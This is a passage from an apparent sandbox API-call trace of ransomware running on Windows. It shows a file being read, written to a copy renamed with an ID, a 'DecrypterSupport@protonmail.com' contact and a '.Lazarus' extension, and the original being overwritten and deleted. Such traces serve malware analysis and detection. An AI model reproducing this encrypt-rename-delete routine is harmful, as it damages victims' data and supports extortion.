Flags=0x0, Size=0x20) returned 0x88388 [0066.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0066.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0066.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0066.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0066.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0066.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0066.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0066.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0066.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0066.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0066.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0066.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0066.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0066.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0066.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0066.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0066.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0066.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0066.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71ca0 [0066.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0066.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0066.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0066.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0066.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0066.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0066.998] AreFileApisANSI () returned 1 [0066.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1038\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1038\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0066.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0066.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.999] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0066.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0066.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0066.999] AreFileApisANSI () returned 1 [0066.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0066.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0066.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 36 [0067.007] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.007] GetFileType (hFile=0x420) returned 0x1 [0067.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0067.007] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0067.007] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0067.007] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0067.008] CloseHandle (hObject=0x420) returned 1 [0067.008] AreFileApisANSI () returned 1 [0067.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0067.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x693f0 [0067.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 36 [0067.008] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.008] GetFileType (hFile=0x420) returned 0x1 [0067.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0067.008] CloseHandle (hObject=0x420) returned 1 [0067.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0067.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0067.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0067.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0067.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0067.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0067.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0067.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0067.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0067.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0067.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0067.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0067.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0067.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0067.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0067.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0067.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0067.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0067.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0067.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0067.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0067.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0067.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0067.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0067.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0067.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0067.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0067.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0067.009] AreFileApisANSI () returned 1 [0067.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0067.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69170 [0067.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 36 [0067.009] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x109e)) returned 1 [0067.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0067.009] AreFileApisANSI () returned 1 [0067.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0067.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0067.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0067.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0067.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0067.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0067.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0067.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0067.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0067.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0067.009] GetLastError () returned 0x0 [0067.009] SetLastError (dwErrCode=0x0) [0067.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e298 [0067.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8c430 [0067.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8be28 [0067.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0067.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0067.010] GetLastError () returned 0x0 [0067.010] SetLastError (dwErrCode=0x0) [0067.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0067.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0067.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69300 [0067.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0067.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75be8 [0067.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0067.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0067.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0067.010] AreFileApisANSI () returned 1 [0067.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0067.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x51398 [0067.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=98 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 98 [0067.010] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.100] GetFileType (hFile=0x420) returned 0x1 [0067.100] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0067.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0067.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0067.100] AreFileApisANSI () returned 1 [0067.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0067.100] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69210 [0067.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x69210, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 36 [0067.100] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.100] GetFileType (hFile=0x428) returned 0x1 [0067.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0067.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0067.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0067.101] GetLastError () returned 0x0 [0067.101] SetLastError (dwErrCode=0x0) [0067.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0067.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0067.101] GetLastError () returned 0x0 [0067.101] SetLastError (dwErrCode=0x0) [0067.101] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0067.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0067.101] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0067.101] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0067.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0067.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0067.103] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x85fc0 [0067.103] GetLastError () returned 0x0 [0067.103] SetLastError (dwErrCode=0x0) [0067.103] GetLastError () returned 0x0 [0067.103] SetLastError (dwErrCode=0x0) [0067.103] GetLastError () returned 0x0 [0067.103] SetLastError (dwErrCode=0x0) [0067.103] GetLastError () returned 0x0 [0067.103] SetLastError (dwErrCode=0x0) [0067.104] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x9e, lpOverlapped=0x0) returned 1 [0067.104] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0067.104] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.105] GetLastError () returned 0x0 [0067.105] SetLastError (dwErrCode=0x0) [0067.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d660 [0067.105] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0067.105] GetLastError () returned 0x0 [0067.105] SetLastError (dwErrCode=0x0) [0067.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0067.106] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0xa0, lpOverlapped=0x0) returned 1 [0067.106] GetLastError () returned 0x0 [0067.106] SetLastError (dwErrCode=0x0) [0067.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d660 | out: hHeap=0x20000) returned 1 [0067.106] GetLastError () returned 0x0 [0067.106] SetLastError (dwErrCode=0x0) [0067.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0067.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0067.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5b8 | out: hHeap=0x20000) returned 1 [0067.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0067.106] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0067.106] CloseHandle (hObject=0x420) returned 1 [0067.107] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0067.108] CloseHandle (hObject=0x428) returned 1 [0067.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0067.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0067.108] AreFileApisANSI () returned 1 [0067.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0067.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0067.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 36 [0067.108] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.109] GetFileType (hFile=0x428) returned 0x1 [0067.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0067.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0067.110] GetLastError () returned 0xb7 [0067.110] SetLastError (dwErrCode=0xb7) [0067.110] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0067.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0067.110] CloseHandle (hObject=0x428) returned 1 [0067.111] AreFileApisANSI () returned 1 [0067.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0067.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x690d0 [0067.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dff8, cbMultiByte=-1, lpWideCharStr=0x690d0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 36 [0067.111] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf")) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x690d0 | out: hHeap=0x20000) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8be28 | out: hHeap=0x20000) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0067.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0067.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.112] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x151aa, dwReserved0=0x1, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0067.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0067.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0067.112] HeapFree (in: 